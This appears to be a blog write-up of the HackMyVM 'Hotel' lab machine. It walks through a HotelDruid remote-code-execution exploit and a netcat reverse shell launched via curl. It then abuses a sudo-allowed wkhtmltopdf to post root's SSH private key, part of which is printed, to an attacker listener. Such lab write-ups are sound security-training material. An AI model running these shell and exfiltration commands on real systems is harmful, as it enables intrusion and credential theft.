HackMyVM - Hotel
Another nice machine from sML, Its classed as easy but it does have its challenges. It contains a really satisfying user escalation that is just beautiful, getting the root flag isn't too difficult but I found it a bit more of a challenge to actually get root.
Find It
┌──(kali㉿kali)-[~/hotel]
└─$ sudo netdiscover -r 10.0.0.0/24 -P | tee findit
[sudo] password for kali:
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.0.0.1 08:00:27:fe:f1:51 1 60 PCS Systemtechnik GmbH
10.0.0.38 08:00:27:cd:b0:5d 1 60 PCS Systemtechnik GmbH
-- Active scan completed, 2 Hosts found.
Scan it
┌──(kali㉿kali)-[~/hotel]
└─$ nmap -T4 -p- -sC -sV -oN nmap.out 10.0.0.38 130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-22 18:44 EST
Nmap scan report for 10.0.0.38
Host is up (0.00081s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 06:1f:a2:25:19:45:2b:2f:44:cc:74:7a:e2:9b:ab:ac (RSA)
| 256 6f:b9:da:fb:eb:6b:4c:de:33:63:b7:ce:f0:2f:f7:cd (ECDSA)
|_ 256 84:fb:1d:5c:4c:c6:60:e8:47:d8:2f:a0:92:8e:fb:18 (ED25519)
80/tcp open http nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Hoteldruid
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.00 seconds
So just looks like ssh & web
The website is running something called 'HotelDruid'
Searching Explots-db.com has a published exploit script to download.
https://www.exploit-db.com/exploits/50754
RCE
┌──(kali㉿kali)-[~/hotel]
└─$ python3 ./50754.py -t http://10.0.0.38 --noauth 2 ⨯
/$$ /$$ /$$ /$$ /$$$$$$$ /$$ /$$
| $$ | $$ | $$ | $$ | $$__ $$ |__/ | $$
| $$ | $$ /$$$$$$ /$$$$$$ /$$$$$$ | $$ | $$ \ $$ /$$$$$$ /$$ /$$ /$$ /$$$$$$$
| $$$$$$$$ /$$__ $$|_ $$_/ /$$__ $$| $$ | $$ | $$ /$$__ $$| $$ | $$| $$ /$$__ $$
| $$__ $$| $$ \ $$ | $$ | $$$$$$$$| $$ | $$ | $$| $$ \__/| $$ | $$| $$| $$ | $$
| $$ | $$| $$ | $$ | $$ /$$| $$_____/| $$ | $$ | $$| $$ | $$ | $$| $$| $$ | $$
| $$ | $$| $$$$$$/ | $$$$/| $$$$$$$| $$ | $$$$$$$/| $$ | $$$$$$/| $$| $$$$$$$
|__/ |__/ \______/ \___/ \_______/|__/ |_______/ |__/ \______/ |__/ \_______/
Exploit By - 0z09e (https://twitter.com/0z09e)
[*] Trying to access the Dashboard.
[*] Checking the privilege of the user.
[+] User has the privilege to add room.
[*] Adding a new room.
[+] Room has been added successfully.
[*] Testing code exection
[+] Code executed successfully, Go to http://10.0.0.38/dati/selectappartamenti.php and execute the code with the parameter 'cmd'.
[+] Example : http://10.0.0.38/dati/selectappartamenti.php?cmd=id
[+] Example Output : uid=33(www-data) gid=33(www-data) groups=33(www-data)
┌──(kali㉿kali)-[~/hotel]
└─$ curl http://10.0.0.38/dati/selectappartamenti.php?cmd=nc%20-e/bin/bash%2010.0.0.10%204444
whist having a netcat listener ready to accept it.
┌──(kali㉿kali)-[~/hotel]
└─$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.0.0.10] from (UNKNOWN) [10.0.0.38] 57262
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@hotel:~/html/hoteldruid/dati$
Escalate to user
www-data@hotel:~/html$ pwd
pwd
/var/www/html
www-data@hotel:~/html$ ls -al
ls -al
total 16
drwxr-xr-x 3 root root 4096 Feb 20 15:12 .
drwxr-xr-x 3 root root 4096 Feb 20 14:42 ..
drwxr-xr-x 7 person person 4096 Aug 18 2021 hoteldruid
-rw-r--r-- 1 www-data www-data 1592 Feb 20 15:11 ttylog
www-data@hotel:~/html$
transferring ttylog to kali and having a brief look at it with strings and hexedit identified it as the name suggests of a raw log of a tty session - but it is difficult to pick out exactly what it contains with the control characters etc.
Researching how to replay tty logs identifies 'ipbt'
http://manpages.ubuntu.com/manpages/impish/man1/ipbt.1.html
┌──(kali㉿kali)-[~/hotel]
└─$ ipbt -A ttylog 8 ⨯
Reading ttylog (ttyrec) ... 103 frames
Total 103 frames, 1592 bytes loaded, 31585400 bytes of memory used
Total loading time: 0 seconds (0 sec/Mb)
With the password and only one user account on the server we can just ssh in with credentials.
Escalate to root
person@hotel:~$ sudo -l
Matching Defaults entries for person on hotel:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User person may run the following commands on hotel:
(root) NOPASSWD: /usr/bin/wkhtmltopdf
person@hotel:~$
So getting the root flag is quite easy:
person@hotel:~$ sudo /usr/bin/wkhtmltopdf /root/root.txt root.pdf
QStandardPaths: XDG_RUNTIME_DIR not set, defaulting to '/tmp/runtime-root'
Loading page (1/2)
Printing pages (2/2)
Done
person@hotel:~$
Transfer the pdf to a machine with a pdf reader and just read it.
I wanted to actually get root rather than just read the flag so I kept at it for a while.
Trying a number of different methods to get the .ssh/id_rsa got odd errors about webkit error 102...
Reading the enhanced help shows the commands including support for posting files...
So running netcat on kali to listen on port 8000 and posting the file instead
person@hotel:~$ sudo /usr/bin/wkhtmltopdf --post-file 'file' /root/.ssh/id_rsa http://10.0.0.10:8000/ out.pdf
QStandardPaths: XDG_RUNTIME_DIR not set, defaulting to '/tmp/runtime-root'
Loading page (1/2)
[> ] 0%
┌──(kali㉿kali)-[~/hotel]
─$ nc -nvlp 8000
listening on [any] 8000 ...
connect to [10.0.0.10] from (UNKNOWN) [10.0.0.38] 39274
POST / HTTP/1.1
Host: 10.0.0.10:8000
Content-Type: multipart/form-data, boundary=57c78b70dca44402aea07ac60c3e581d
User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/602.1 (KHTML, like Gecko) wkhtmltopdf Version/10.0 Safari/602.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: null
Content-Length: 2727
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Accept-Language: es-ES,en,*
--57c78b70dca44402aea07ac60c3e581d
content-disposition: form-data; name="file"; filename="id_rsa"
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAtumGaKJe1rTvvHIay2XsiU7x3Jsm6atRdtGPxI1HbpriIXAzAumN
DI/+eIbZWIcX0P5fQcSYH+j+MPs9X/xB0sQ1niwdxzuj6V2ZhiTN1gPpGHLNyyZcu7U2KK
Then it's just a case of copying the key to a file, setting permissions correctly and connecting as root.
┌──(kali㉿kali)-[~/hotel]
└─$ chmod 600 root.key
┌──(kali㉿kali)-[~/hotel]
└─$ ssh root@10.0.0.38 -i root.key
Linux hotel 5.10.0-11-amd64 #1 SMP Debian 5.10.92-1 (2022-01-18) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Feb 22 17:45:01 2022 from 10.0.0.10
root@hotel:~#
Comments
Post a Comment